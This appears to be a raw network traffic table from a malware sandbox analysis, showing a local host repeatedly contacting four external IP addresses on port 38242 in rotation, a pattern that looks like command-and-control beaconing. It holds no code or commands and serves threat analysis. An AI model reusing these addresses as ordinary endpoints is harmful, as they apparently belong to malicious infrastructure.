                                                                                Oct 11, 2024 10:45:32.642374992 CEST5305638242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:32.642394066 CEST5305638242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:32.648802996 CEST3824253056185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:45:33.151560068 CEST5305638242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:33.170417070 CEST3824253056185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:45:33.170597076 CEST5305638242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:34.153228998 CEST6002638242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:34.158224106 CEST3824260026154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:45:34.158283949 CEST6002638242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:34.158318043 CEST6002638242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:34.163470984 CEST3824260026154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:45:34.669265985 CEST6002638242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:34.674623013 CEST3824260026154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:45:34.674698114 CEST6002638242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:35.671648979 CEST4105638242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:35.676829100 CEST3824241056193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:45:35.676915884 CEST4105638242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:35.676954985 CEST4105638242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:35.681850910 CEST3824241056193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:45:36.184664011 CEST4105638242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:36.232738972 CEST3824241056193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:45:36.235555887 CEST3824241056193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:45:36.235647917 CEST4105638242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:37.186619043 CEST3888238242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:37.191493988 CEST382423888287.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:45:37.191606045 CEST3888238242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:37.191656113 CEST3888238242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:37.196474075 CEST382423888287.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:45:37.700329065 CEST3888238242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:37.748589039 CEST382423888287.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:45:37.748874903 CEST3888238242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:38.702498913 CEST5306438242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:38.707463026 CEST3824253064185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:45:38.707545996 CEST5306438242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:38.707576036 CEST5306438242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:38.712822914 CEST3824253064185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:45:39.215527058 CEST5306438242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:39.234549999 CEST3824253064185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:45:39.234646082 CEST5306438242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:40.216988087 CEST6003438242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:40.221972942 CEST3824260034154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:45:40.222034931 CEST6003438242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:40.222091913 CEST6003438242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:40.227478981 CEST3824260034154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:45:40.728208065 CEST6003438242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:40.733833075 CEST3824260034154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:45:40.733913898 CEST6003438242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:41.729818106 CEST4106438242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:41.734728098 CEST3824241064193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:45:41.734821081 CEST4106438242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:41.734821081 CEST4106438242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:41.739655018 CEST3824241064193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:45:42.241221905 CEST4106438242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:42.270131111 CEST3824241064193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:45:42.270308018 CEST4106438242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:43.242705107 CEST3889038242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:43.247663021 CEST382423889087.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:45:43.247755051 CEST3889038242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:43.247786045 CEST3889038242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:43.252568007 CEST382423889087.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:45:43.754493952 CEST3889038242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:43.800690889 CEST382423889087.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:45:43.824812889 CEST382423889087.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:45:43.825150013 CEST3889038242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:44.756827116 CEST5307238242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:44.761720896 CEST3824253072185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:45:44.761822939 CEST5307238242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:44.761864901 CEST5307238242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:44.767648935 CEST3824253072185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:45:45.270723104 CEST5307238242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:45.286118031 CEST3824253072185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:45:45.286205053 CEST5307238242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:46.272684097 CEST6004238242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:46.277709007 CEST3824260042154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:45:46.277790070 CEST6004238242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:46.277790070 CEST6004238242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:46.282599926 CEST3824260042154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:45:46.786703110 CEST6004238242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:46.983778954 CEST3824260042154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:45:46.983993053 CEST6004238242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:47.788472891 CEST4107238242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:47.793406010 CEST3824241072193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:45:47.793490887 CEST4107238242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:47.793514967 CEST4107238242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:47.798849106 CEST3824241072193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:45:48.302333117 CEST4107238242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:48.348340034 CEST3824241072193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:45:48.348455906 CEST4107238242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:49.304841042 CEST3889838242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:49.309860945 CEST382423889887.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:45:49.310105085 CEST3889838242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:49.310105085 CEST3889838242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:49.314944983 CEST382423889887.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:45:49.817635059 CEST3889838242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:49.864769936 CEST382423889887.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:45:49.885776997 CEST382423889887.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:45:49.885988951 CEST3889838242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:50.820010900 CEST5308038242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:50.825001001 CEST3824253080185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:45:50.825104952 CEST5308038242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:50.825158119 CEST5308038242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:50.830066919 CEST3824253080185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:45:51.335568905 CEST5308038242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:51.352493048 CEST3824253080185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:45:51.352586031 CEST5308038242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:52.338104010 CEST6005038242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:52.343225956 CEST3824260050154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:45:52.343297958 CEST6005038242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:52.343358994 CEST6005038242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:52.348397017 CEST3824260050154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:45:52.852576017 CEST6005038242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:52.858155966 CEST3824260050154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:45:52.858253956 CEST6005038242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:53.854984045 CEST4108038242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:54.771090984 CEST3824241080193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:45:54.771269083 CEST4108038242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:54.771373034 CEST4108038242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:54.776235104 CEST3824241080193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:45:55.265052080 CEST43928443192.168.2.2391.189.91.42
                                                                                Oct 11, 2024 10:45:55.281280994 CEST4108038242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:55.309497118 CEST3824241080193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:45:55.309721947 CEST4108038242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:56.283647060 CEST3890638242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:56.291599035 CEST382423890687.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:45:56.291749954 CEST3890638242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:56.291749954 CEST3890638242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:56.299377918 CEST382423890687.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:45:56.800373077 CEST3890638242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:56.848664045 CEST382423890687.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:45:56.848787069 CEST3890638242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:57.802325010 CEST5308838242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:57.807426929 CEST3824253088185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:45:57.807517052 CEST5308838242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:57.807570934 CEST5308838242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:57.812525988 CEST3824253088185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:45:58.314404964 CEST5308838242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:58.332899094 CEST3824253088185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:45:58.332994938 CEST5308838242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:59.316194057 CEST6005838242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:59.321331978 CEST3824260058154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:45:59.321432114 CEST6005838242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:59.321475983 CEST6005838242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:59.326443911 CEST3824260058154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:45:59.828988075 CEST6005838242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:59.834417105 CEST3824260058154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:45:59.834507942 CEST6005838242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:00.831043005 CEST4108838242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:00.836137056 CEST3824241088193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:46:00.836220026 CEST4108838242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:00.836427927 CEST4108838242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:00.842274904 CEST3824241088193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:46:01.343971014 CEST4108838242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:01.386929989 CEST3824241088193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:46:01.387232065 CEST4108838242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:02.346057892 CEST3891438242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:02.351053953 CEST382423891487.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:46:02.351149082 CEST3891438242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:02.351205111 CEST3891438242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:02.356519938 CEST382423891487.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:46:02.859852076 CEST3891438242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:02.911709070 CEST382423891487.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:46:02.912022114 CEST3891438242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:03.861742020 CEST5309638242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:03.866944075 CEST3824253096185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:46:03.867013931 CEST5309638242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:03.867082119 CEST5309638242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:03.872040987 CEST3824253096185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:46:04.375909090 CEST5309638242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:04.397005081 CEST3824253096185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:46:04.397089005 CEST5309638242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:05.377643108 CEST6006638242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:05.382769108 CEST3824260066154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:46:05.382843018 CEST6006638242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:05.382908106 CEST6006638242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:05.388290882 CEST3824260066154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:46:05.892169952 CEST6006638242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:05.897953033 CEST3824260066154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:46:05.898040056 CEST6006638242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:06.894345045 CEST4109638242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:06.899446011 CEST3824241096193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:46:06.899522066 CEST4109638242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:06.899599075 CEST4109638242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:06.904577971 CEST3824241096193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:46:07.409430981 CEST4109638242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:07.442790985 CEST3824241096193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:46:07.442960024 CEST4109638242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:08.411804914 CEST3892238242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:08.416822910 CEST382423892287.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:46:08.416937113 CEST3892238242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:08.416990995 CEST3892238242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:08.422399044 CEST382423892287.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:46:08.924426079 CEST3892238242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:08.971738100 CEST382423892287.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:46:08.971930981 CEST3892238242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:09.926219940 CEST5310438242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:09.931058884 CEST3824253104185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:46:09.931114912 CEST5310438242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:09.931173086 CEST5310438242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:09.935894012 CEST3824253104185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:46:10.438489914 CEST5310438242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:10.450535059 CEST3824253104185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:46:10.450629950 CEST5310438242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:11.440810919 CEST6007438242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:11.445666075 CEST3824260074154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:46:11.445779085 CEST6007438242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:11.445779085 CEST6007438242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:11.450623989 CEST3824260074154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:46:11.951112032 CEST6007438242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:11.956229925 CEST3824260074154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:46:11.956358910 CEST6007438242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:12.952620983 CEST4110438242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:12.957510948 CEST3824241104193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:46:12.957634926 CEST4110438242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:12.957634926 CEST4110438242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:12.962441921 CEST3824241104193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:46:13.463952065 CEST4110438242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:13.504483938 CEST3824241104193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:46:13.504595041 CEST4110438242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:14.465990067 CEST3893038242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:14.471755981 CEST382423893087.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:46:14.471833944 CEST3893038242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:14.471896887 CEST3893038242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:14.477407932 CEST382423893087.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:46:14.979104996 CEST3893038242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:15.028772116 CEST382423893087.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:46:15.038450003 CEST382423893087.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:46:15.038605928 CEST3893038242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:15.980633974 CEST5311238242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:15.985560894 CEST3824253112185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:46:15.985661030 CEST5311238242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:15.985711098 CEST5311238242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:15.990577936 CEST3824253112185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:46:16.492487907 CEST5311238242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:16.514046907 CEST3824253112185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:46:16.514162064 CEST5311238242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:17.495131969 CEST6008238242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:17.500107050 CEST3824260082154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:46:17.500237942 CEST6008238242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:17.500262976 CEST6008238242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:17.505183935 CEST3824260082154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:46:18.008440971 CEST6008238242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:18.015463114 CEST3824260082154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:46:18.015521049 CEST6008238242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:19.010344028 CEST4111238242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:19.015417099 CEST3824241112193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:46:19.015494108 CEST4111238242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:19.015544891 CEST4111238242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:19.021013021 CEST3824241112193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:46:19.524265051 CEST4111238242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:19.555711985 CEST3824241112193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:46:19.555855036 CEST4111238242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:20.526318073 CEST3893838242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:20.531157017 CEST382423893887.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:46:20.531244040 CEST3893838242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:20.531287909 CEST3893838242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:20.536056995 CEST382423893887.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:46:21.037576914 CEST3893838242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:21.077074051 CEST382423893887.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:46:21.077373981 CEST3893838242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:22.039685011 CEST5312038242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:22.044553995 CEST3824253120185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:46:22.044641972 CEST5312038242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:22.044689894 CEST5312038242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:22.049590111 CEST3824253120185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:46:22.552593946 CEST5312038242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:22.567373991 CEST3824253120185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:46:22.567565918 CEST5312038242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:23.554384947 CEST6009038242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:23.559333086 CEST3824260090154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:46:23.559454918 CEST6009038242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:23.559456110 CEST6009038242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:23.564311028 CEST3824260090154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:46:24.065244913 CEST6009038242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:24.071505070 CEST3824260090154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:46:24.071595907 CEST6009038242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:25.066883087 CEST4112038242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:25.071888924 CEST3824241120193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:46:25.071964979 CEST4112038242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:25.072016954 CEST4112038242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:25.076953888 CEST3824241120193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:46:25.579741955 CEST4112038242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:25.626333952 CEST3824241120193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:46:25.626605988 CEST4112038242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:26.582050085 CEST3894638242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:26.586993933 CEST382423894687.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:46:26.587081909 CEST3894638242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:26.587125063 CEST3894638242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:26.592001915 CEST382423894687.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:46:27.094651937 CEST3894638242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:27.140717030 CEST382423894687.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:46:27.146176100 CEST382423894687.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:46:27.146243095 CEST3894638242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:28.096168995 CEST5312838242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:28.101078033 CEST3824253128185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:46:28.101131916 CEST5312838242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:28.101181984 CEST5312838242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:28.106326103 CEST3824253128185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:46:28.609272003 CEST5312838242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:28.619277954 CEST3824253128185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:46:28.619359970 CEST5312838242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:46:29.611304045 CEST6009838242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:29.616295099 CEST3824260098154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:46:29.616364956 CEST6009838242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:29.616399050 CEST6009838242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:29.621402025 CEST3824260098154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:46:30.122709036 CEST6009838242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:30.128705978 CEST3824260098154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:46:30.128784895 CEST6009838242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:46:31.124475956 CEST4112838242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:31.130191088 CEST3824241128193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:46:31.130387068 CEST4112838242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:31.130388021 CEST4112838242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:31.135284901 CEST3824241128193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:46:31.637224913 CEST4112838242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:31.688724995 CEST3824241128193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:46:31.694389105 CEST3824241128193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:46:31.694911957 CEST4112838242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:46:32.639178991 CEST3895438242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:46:32.644124031 CEST382423895487.120.84.105192.168.2.23
